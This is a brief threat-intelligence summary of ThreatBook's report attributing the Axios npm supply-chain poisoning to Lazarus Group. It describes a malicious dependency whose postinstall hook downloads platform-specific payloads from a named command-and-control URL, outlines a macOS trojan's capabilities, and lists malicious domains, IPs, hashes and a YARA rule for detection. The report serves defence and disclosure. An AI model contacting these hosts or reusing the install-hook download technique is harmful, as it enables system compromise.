ThreatBook attributes the Axios npm supply-chain poisoning incident to Lazarus Group, citing long-term tracking, malware behavior, and infrastructure pivots. The attack used a hijacked Axios maintainer account to publish [email protected] and [email protected] with the malicious dependency [email protected], whose postinstall hook selected Linux, Windows, or macOS payloads from http://sfrclak.com:8000/6202033. ThreatBook’s macOS analysis describes /Library/Caches/com.apple.act.mond as a C++ trojan that collects host and process information, beacons with an old IE user agent, and supports process termination, shell and script execution, process injection, and directory listing. The report links the payload to WAVESHAPER-like tradecraft and lists sfrclak.com, 142.11.206.73, callnrwise.com, related IPs, payload hashes, and a Mandiant-style YARA rule as detection material.